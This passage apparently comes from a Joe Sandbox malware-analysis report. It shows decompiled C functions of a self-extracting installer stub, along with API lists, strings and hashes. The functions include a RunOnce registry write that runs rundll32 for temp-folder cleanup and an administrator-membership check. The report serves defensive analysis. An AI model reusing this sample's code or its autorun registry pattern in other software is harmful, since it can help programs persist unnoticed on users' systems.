                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fd0d461c7b1677b9ffc8c077a038731a0c970258cfe0dba0aaf7b67eec2b27a3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E51D672900216ABEB21FF68CC48BBA7B79EF49300F1441A5FD49A7241EB75DD06CB90
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                                                                                                              			E00A82773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				char _v269;
                                                                                                                                                                                                                                              				CHAR* _v276;
                                                                                                                                                                                                                                              				int _v280;
                                                                                                                                                                                                                                              				void* _v284;
                                                                                                                                                                                                                                              				int _v288;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t23;
                                                                                                                                                                                                                                              				intOrPtr _t34;
                                                                                                                                                                                                                                              				int _t45;
                                                                                                                                                                                                                                              				int* _t50;
                                                                                                                                                                                                                                              				CHAR* _t52;
                                                                                                                                                                                                                                              				CHAR* _t61;
                                                                                                                                                                                                                                              				char* _t62;
                                                                                                                                                                                                                                              				int _t63;
                                                                                                                                                                                                                                              				CHAR* _t64;
                                                                                                                                                                                                                                              				signed int _t65;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t52 = __ecx;
                                                                                                                                                                                                                                              				_t23 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                                                              				_t62 = _a4;
                                                                                                                                                                                                                                              				_t50 = 0;
                                                                                                                                                                                                                                              				_t61 = __ecx;
                                                                                                                                                                                                                                              				_v276 = _t62;
                                                                                                                                                                                                                                              				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                                                              				if( *_t62 != 0x23) {
                                                                                                                                                                                                                                              					_t63 = 0x104;
                                                                                                                                                                                                                                              					goto L14;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t64 = _t62 + 1;
                                                                                                                                                                                                                                              					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                                                              					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                                                              					_t63 = 0x104;
                                                                                                                                                                                                                                              					_t34 = _v269;
                                                                                                                                                                                                                                              					if(_t34 == 0x53) {
                                                                                                                                                                                                                                              						L14:
                                                                                                                                                                                                                                              						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                                                              						goto L15;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						if(_t34 == 0x57) {
                                                                                                                                                                                                                                              							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                                                              							goto L16;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_push(_t52);
                                                                                                                                                                                                                                              							_v288 = 0x104;
                                                                                                                                                                                                                                              							E00A81781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                                                              							_t59 = 0x104;
                                                                                                                                                                                                                                              							E00A8658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                                                              							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                                                              								L16:
                                                                                                                                                                                                                                              								_t59 = _t63;
                                                                                                                                                                                                                                              								E00A8658A(_t61, _t63, _v276);
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								if(RegQueryValueExA(_v284, 0xa81140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                                                              									_t45 = _v280;
                                                                                                                                                                                                                                              									if(_t45 != 2) {
                                                                                                                                                                                                                                              										L9:
                                                                                                                                                                                                                                              										if(_t45 == 1) {
                                                                                                                                                                                                                                              											goto L10;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                              											_t45 = _v280;
                                                                                                                                                                                                                                              											goto L9;
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											_t59 = 0x104;
                                                                                                                                                                                                                                              											E00A81680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                                                              											L10:
                                                                                                                                                                                                                                              											_t50 = 1;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								RegCloseKey(_v284);
                                                                                                                                                                                                                                              								L15:
                                                                                                                                                                                                                                              								if(_t50 == 0) {
                                                                                                                                                                                                                                              									goto L16;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00A86CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                                                              			}
























                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CharUpperA.USER32(D891196D,00000000,00000000,00000000), ref: 00A827A8
                                                                                                                                                                                                                                              • CharNextA.USER32(0000054D), ref: 00A827B5
                                                                                                                                                                                                                                              • CharNextA.USER32(00000000), ref: 00A827BC
                                                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A82829
                                                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,00A81140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A82852
                                                                                                                                                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A82870
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A828A0
                                                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 00A828AA
                                                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32 ref: 00A828B9
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00A827E4
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                                                              • API String ID: 2659952014-2428544900
                                                                                                                                                                                                                                              • Opcode ID: 390a803a28ab9af2018a4b3d4524ec03ac7d1407788fb97188024650bdf55ef7
                                                                                                                                                                                                                                              • Instruction ID: 5aa01728c5d9f103e49b7f74e28f5ea7a230bc02fd8377d3f2e82dd5fc69be3b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 390a803a28ab9af2018a4b3d4524ec03ac7d1407788fb97188024650bdf55ef7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F417371A00128AFEB24AB649C85BFA7BBDEB55700F0440AAF545D2110DB748E969FA1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 62%
                                                                                                                                                                                                                                              			E00A82267() {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				char _v836;
                                                                                                                                                                                                                                              				void* _v840;
                                                                                                                                                                                                                                              				int _v844;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t19;
                                                                                                                                                                                                                                              				intOrPtr _t33;
                                                                                                                                                                                                                                              				void* _t38;
                                                                                                                                                                                                                                              				intOrPtr* _t42;
                                                                                                                                                                                                                                              				void* _t45;
                                                                                                                                                                                                                                              				void* _t47;
                                                                                                                                                                                                                                              				void* _t49;
                                                                                                                                                                                                                                              				signed int _t51;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t19 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                                                              				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                                                              				if( *0xa88530 != 0) {
                                                                                                                                                                                                                                              					_push(_t49);
                                                                                                                                                                                                                                              					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                                                              						_push(_t38);
                                                                                                                                                                                                                                              						_v844 = 0x238;
                                                                                                                                                                                                                                              						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                                                              							_push(_t47);
                                                                                                                                                                                                                                              							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                              							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                              								E00A8658A( &_v268, 0x104, 0xa81140);
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_push("C:\Users\jones\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                                                              							E00A8171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                                                              							_t42 =  &_v836;
                                                                                                                                                                                                                                              							_t45 = _t42 + 1;
                                                                                                                                                                                                                                              							_pop(_t47);
                                                                                                                                                                                                                                              							do {
                                                                                                                                                                                                                                              								_t33 =  *_t42;
                                                                                                                                                                                                                                              								_t42 = _t42 + 1;
                                                                                                                                                                                                                                              							} while (_t33 != 0);
                                                                                                                                                                                                                                              							RegSetValueExA(_v840, "wextract_cleanup2", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                                                              						_pop(_t38);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_pop(_t49);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00A86CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                                                              			}




















                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 00A822A3
                                                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000000,?,?,00000001), ref: 00A822D8
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00A822F5
                                                                                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32 ref: 00A82305
                                                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 00A8236E
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00A8237A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • wextract_cleanup2, xrefs: 00A8227C, 00A822CD, 00A82363
                                                                                                                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00A82299
                                                                                                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00A82321
                                                                                                                                                                                                                                              • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00A8232D
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup2
                                                                                                                                                                                                                                              • API String ID: 3027380567-1720115735
                                                                                                                                                                                                                                              • Opcode ID: 1997ad9dbfb153b7bff54dd2f7e48f5ce353eab84988ac7059d4cbefb4e5a672
                                                                                                                                                                                                                                              • Instruction ID: edf7b5df5d75ec6e4dca50ea9a71f4ac627ceb0b83fb18089fb2c556748cf6df
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1997ad9dbfb153b7bff54dd2f7e48f5ce353eab84988ac7059d4cbefb4e5a672
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4731C571A002187BDB21EB90DC49FEB7B7CFB15700F4401AAB54DAA050EA75AB89CB50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 87%
                                                                                                                                                                                                                                              			E00A83100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                              				void* _t8;
                                                                                                                                                                                                                                              				void* _t11;
                                                                                                                                                                                                                                              				void* _t15;
                                                                                                                                                                                                                                              				struct HWND__* _t16;
                                                                                                                                                                                                                                              				struct HWND__* _t33;
                                                                                                                                                                                                                                              				struct HWND__* _t34;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t8 = _a8 - 0xf;
                                                                                                                                                                                                                                              				if(_t8 == 0) {
                                                                                                                                                                                                                                              					if( *0xa88590 == 0) {
                                                                                                                                                                                                                                              						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                                                              						 *0xa88590 = 1;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					L13:
                                                                                                                                                                                                                                              					return 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t11 = _t8 - 1;
                                                                                                                                                                                                                                              				if(_t11 == 0) {
                                                                                                                                                                                                                                              					L7:
                                                                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                                                                              					L8:
                                                                                                                                                                                                                                              					EndDialog(_a4, ??);
                                                                                                                                                                                                                                              					L9:
                                                                                                                                                                                                                                              					return 1;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t15 = _t11 - 0x100;
                                                                                                                                                                                                                                              				if(_t15 == 0) {
                                                                                                                                                                                                                                              					_t16 = GetDesktopWindow();
                                                                                                                                                                                                                                              					_t33 = _a4;
                                                                                                                                                                                                                                              					E00A843D0(_t33, _t16);
                                                                                                                                                                                                                                              					SetDlgItemTextA(_t33, 0x834,  *0xa88d4c);
                                                                                                                                                                                                                                              					SetWindowTextA(_t33, "lenta");
                                                                                                                                                                                                                                              					SetForegroundWindow(_t33);
                                                                                                                                                                                                                                              					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                                                              					 *0xa888b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                                                              					SetWindowLongA(_t34, 0xfffffffc, E00A830C0);
                                                                                                                                                                                                                                              					return 1;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(_t15 != 1) {
                                                                                                                                                                                                                                              					goto L13;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(_a12 != 6) {
                                                                                                                                                                                                                                              					if(_a12 != 7) {
                                                                                                                                                                                                                                              						goto L9;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					goto L7;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_push(1);
                                                                                                                                                                                                                                              				goto L8;
                                                                                                                                                                                                                                              			}










                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • EndDialog.USER32(?,00000000), ref: 00A8313B
                                                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 00A8314B
                                                                                                                                                                                                                                              • SetDlgItemTextA.USER32(?,00000834), ref: 00A8316A
                                                                                                                                                                                                                                              • SetWindowTextA.USER32(?,lenta), ref: 00A83176
                                                                                                                                                                                                                                              • SetForegroundWindow.USER32(?), ref: 00A8317D
                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000834), ref: 00A83185
                                                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000FC), ref: 00A83190
                                                                                                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000FC,00A830C0), ref: 00A831A3
                                                                                                                                                                                                                                              • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 00A831CA
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
• Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                                                              • String ID: lenta
                                                                                                                                                                                                                                              • API String ID: 3785188418-2780258678
                                                                                                                                                                                                                                              • Opcode ID: 249f27e1e1334340e4506099e3f6070a11e082b4cb18fab67110a2602852ad48
                                                                                                                                                                                                                                              • Instruction ID: f24d737f435cde1eba9a2679558f61f6d210210f5237304f9efe4e9c9fff8e6b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 249f27e1e1334340e4506099e3f6070a11e082b4cb18fab67110a2602852ad48
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F7118132644211BBEF21EFA4AC0CB9A3E64FB5AF21F100712F915951E0EB799642C752
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 91%
                                                                                                                                                                                                                                              			E00A818A3(void* __edx, void* __esi) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				short _v12;
                                                                                                                                                                                                                                              				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                                                                              				long _v24;
                                                                                                                                                                                                                                              				void* _v28;
                                                                                                                                                                                                                                              				void* _v32;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				signed int _t23;
                                                                                                                                                                                                                                              				long _t45;
                                                                                                                                                                                                                                              				void* _t49;
                                                                                                                                                                                                                                              				int _t50;
                                                                                                                                                                                                                                              				void* _t52;
                                                                                                                                                                                                                                              				signed int _t53;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t51 = __esi;
                                                                                                                                                                                                                                              				_t49 = __edx;
                                                                                                                                                                                                                                              				_t23 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                                                              				_t25 =  *0xa88128; // 0x2
                                                                                                                                                                                                                                              				_t45 = 0;
                                                                                                                                                                                                                                              				_v12 = 0x500;
                                                                                                                                                                                                                                              				_t50 = 2;
                                                                                                                                                                                                                                              				_v16.Value = 0;
                                                                                                                                                                                                                                              				_v20 = 0;
                                                                                                                                                                                                                                              				if(_t25 != _t50) {
                                                                                                                                                                                                                                              					L20:
                                                                                                                                                                                                                                              					return E00A86CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(E00A817EE( &_v20) != 0) {
                                                                                                                                                                                                                                              					_t25 = _v20;
                                                                                                                                                                                                                                              					if(_v20 != 0) {
                                                                                                                                                                                                                                              						 *0xa88128 = 1;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					goto L20;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                                                              					goto L20;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                                                              					L17:
                                                                                                                                                                                                                                              					CloseHandle(_v28);
                                                                                                                                                                                                                                              					_t25 = _v20;
                                                                                                                                                                                                                                              					goto L20;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_push(__esi);
                                                                                                                                                                                                                                              					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                                                              					if(_t52 == 0) {
                                                                                                                                                                                                                                              						L16:
                                                                                                                                                                                                                                              						_pop(_t51);
                                                                                                                                                                                                                                              						goto L17;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                                                              						L15:
                                                                                                                                                                                                                                              						LocalFree(_t52);
                                                                                                                                                                                                                                              						goto L16;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						if( *_t52 <= 0) {
                                                                                                                                                                                                                                              							L14:
                                                                                                                                                                                                                                              							FreeSid(_v32);
                                                                                                                                                                                                                                              							goto L15;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                                                              						_t50 = _t15;
                                                                                                                                                                                                                                              						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                                                              							_t45 = _t45 + 1;
                                                                                                                                                                                                                                              							_t50 = _t50 + 8;
                                                                                                                                                                                                                                              							if(_t45 <  *_t52) {
                                                                                                                                                                                                                                              								continue;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							goto L14;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						 *0xa88128 = 1;
                                                                                                                                                                                                                                              						_v20 = 1;
                                                                                                                                                                                                                                              						goto L14;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}


















                                                                                                                                                                                                                                              0x00a819a2
                                                                                                                                                                                                                                              0x00a819a3
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8196e
                                                                                                                                                                                                                                              0x00a81970
                                                                                                                                                                                                                                              0x00a81999
                                                                                                                                                                                                                                              0x00a8199c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8199c
                                                                                                                                                                                                                                              0x00a81972
                                                                                                                                                                                                                                              0x00a81972
                                                                                                                                                                                                                                              0x00a81975
                                                                                                                                                                                                                                              0x00a81984
                                                                                                                                                                                                                                              0x00a81985
                                                                                                                                                                                                                                              0x00a8198a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8198c
                                                                                                                                                                                                                                              0x00a81991
                                                                                                                                                                                                                                              0x00a81996
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a81996
                                                                                                                                                                                                                                              0x00a8194c

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00A817EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00A818DD), ref: 00A8181A
                                                                                                                                                                                                                                                • Part of subcall function 00A817EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00A8182C
                                                                                                                                                                                                                                                • Part of subcall function 00A817EE: AllocateAndInitializeSid.ADVAPI32(00A818DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00A818DD), ref: 00A81855
                                                                                                                                                                                                                                                • Part of subcall function 00A817EE: FreeSid.ADVAPI32(?,?,?,?,00A818DD), ref: 00A81883
                                                                                                                                                                                                                                                • Part of subcall function 00A817EE: FreeLibrary.KERNEL32(00000000,?,?,?,00A818DD), ref: 00A8188A
                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 00A818EB
                                                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00A818F2
                                                                                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 00A8190A
                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00A81918
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000000,?,?), ref: 00A8192C
                                                                                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00A81944
                                                                                                                                                                                                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00A81964
                                                                                                                                                                                                                                              • EqualSid.ADVAPI32(00000004,?), ref: 00A8197A
                                                                                                                                                                                                                                              • FreeSid.ADVAPI32(?), ref: 00A8199C
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 00A819A3
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00A819AD
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2168512254-0
                                                                                                                                                                                                                                              • Opcode ID: 59bffca94b0099b5f7fed9b045a0bfe122e643e7d164389d151c96bc18aa522f
                                                                                                                                                                                                                                              • Instruction ID: e3b7cedbe4a11f86c7e978b95e0a3ab3e3bd9c476843d315844ed007d67bb661
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 59bffca94b0099b5f7fed9b045a0bfe122e643e7d164389d151c96bc18aa522f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8631F971A00209EBEB20EFE5DC98AAFBBBCFB14750F50442AE545D6150DB359906CB61
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                                                                                                              			E00A8468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                              				long _t4;
                                                                                                                                                                                                                                              				void* _t11;
                                                                                                                                                                                                                                              				CHAR* _t14;
                                                                                                                                                                                                                                              				void* _t15;
                                                                                                                                                                                                                                              				long _t16;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t14 = __ecx;
